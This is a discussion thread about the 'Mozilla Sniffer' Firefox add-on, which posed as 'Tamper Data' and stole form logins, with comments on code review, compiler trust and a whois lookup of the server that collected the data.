How the Mozilla Sniffer Backdoor Was Discovered

An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."

Informative article

[Cathoderoytube]

Good job not actually telling the name of the offending plugin in the article blurb there. 'A new severe bug in mozilla is allowing hooligans to steal your passwords. But we won't tell you which one until after the break!'

Re:Informative article

RTFT.

Re:Informative article

[renrutal]

From TFA:

An add-on called “Mozilla Sniffer” was uploaded on June 6th to addons.mozilla.org. It was discovered that this add-on contains code that intercepts login data submitted to any website, and sends this data to a remote location. Upon discovery on July 12th, the add-on was disabled and added to the blocklist, which will prompt the add-on to be uninstalled for all current users.

Re:Informative article

[stephanruby]

That may because telling you the name was only half of the issue. The name of the plugin was 'Mozilla Sniffer', but the real name you should hunt down is 'Tamper Data' to make sure you get rid of this thing (not that the makers of the popular 'Tamper Data' extension did anything wrong, it was just that 'Mozilla Sniffer' was disguising itself as 'Tamper Data' by using its uuid and inserting the malicious part of its code into the 'Tamper Data' folder).

Re:It was bound to happen eventually..

[fuzzyfuzzyfungus]

Is there? Apple's review process doesn't demand source(and, given the review volume, there is Absolutely. No. Way they would be giving proper attention to detecting subtle malice, even if they did). The review process seems to be reasonably good at weeding out applications that crash horribly often enough that the reviewer will run into a crash, which blatantly violate the rules, which seem likely to be fodder for stories that will tarnish Apple's PR, or which "duplicate" some feature that exists or is on Apple's secret roadmap. It has also been rumored that they have some sort of static analysis tool to detect use of private APIs.

Nothing in that process would detect any but the most blatantly unsubtle malice(and, given that reviews tend to occur fairly quickly, something as simple as recording the date of first run, and not doing anything evil until 1 month has passed would probably count as "subtle" for the purposes of this exercise).

If malice is detected by a third party, or by some after-the-fact spot-check; both Apple and Android have practically identical capabilities to "unpublish and remove" an application from any device that hasn't been divorced from the mothership. For that matter, Mozilla can also issue FF updates that disable add-ons(as they did a while back for that MS .NET one, and as they have announced they will do here).

Re:Native features in browser

[eddy]

>And since Opera is not open source, there is no way to be sure of that.

Sure there is, you can reverse-engineer it to see what it does. You know, just because all you have is the binary doesn't mean you've suddenly entered a magic land where nothing can be understood.

(I'm going to ignore "but can you trust your tools" asshatery)

It was experimental, warnings were there

[Coopjust]

The addon was experimental, and whenever you try to install an experimental addon you have to check a box acknowledging it's experimental before the install button works, and it's tagged with a scary warning that it could blow up your computer or compromise the security of Firefox due to the lack of code review.

Not only that, but the author couldn't even use proper English in the addon description:

View and modify HTTP/HTTPS headers it's base on tamper data but many problems have been solved in this version u can check it out.

Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.

Re:Native features in browser

[Pollardito]

Unless you go through all the code yourself, there's no way to be sure of anything.

you mean unless you go through the code, compile it yourself using a compiler whose code you've also audited and itself was not compiled by an unaudited compiler

Re:Native features in browser

[bsDaemon]

No, I've seen it. I used to have a pretty decent email pen-pal thing going on with Ken about 10 years ago. He's a pretty cool dude. The point is, yes, even if you see the code, unless you have the code to the compiler and build it yourself, then you can't trust the binary. Basically, you can't trust anything you don't create from scratch. There could also be back-doors in ROM in the hardware. Which is why I go on to say how even if you do your own audit you can't actually trust anything. Either you won't understand everything, you'll have taken in too much information and miss something vital or,as per your example, the real root of the problem will be so obscured from view that it doesn't even matter what you're auditing.

Re:Advertised purpose?

[Coopjust]

It was a modified version of Tamper Data that the author alleged "many problems have been solved in this version".

In addition to modifying several existing files, the author added a file called tamperPost.js that very deliberately sends every form submission to a remote server. You can see some of the code of this on the Netcraft article in the summary (or or a direct link to the image)

When you see the image, you can see that it was obviously a deliberate attempt to steal credentials.

Re:Native features in browser

[Joce640k]

Source is ok ... but can you trust your compiler?

maybe Dillo?

[mister_playboy]

You could try Dillo.

Re:Native features in browser

[L4t3r4lu5]

Jim: This source is fine.
Jon: This is great, good work.
Jane: Clean and efficient, great addon.

*Create account: Jack*
Jack: Yeah, awesome stuff! Jim, Jon, and Jane are all correct.

*Create account: James*
James: I love this addon! No viruses here :D

Re:Native features in browser

[Jesus_666]

TabGroups Manager. It's not the only extension of its kind, though: There's also Tree Style Tabs that gives you hierarchical, if space-intensive, tabs and Tab Kit, which apparently offers both functionalities in one package - however, I haven't tested the it and can't say how well it works.

In case you're a beta user: Tree Style Tabs says it's 4.0b1-compatible; TabGroups Manager doesn't but works apart from a cosmetic issue (the tab group bar appears below the tab bar instead of above it).

Re:Native features in browser

[NoOneInParticular]

Case in point: the Debian ssl fiasco, rendering all Debian as well as derivatives vulnerable to a simple attack for 2 years.

74.220.219.77/~beverlz5

[Smallpond]

jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]

OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US

So has law enforcement been notified?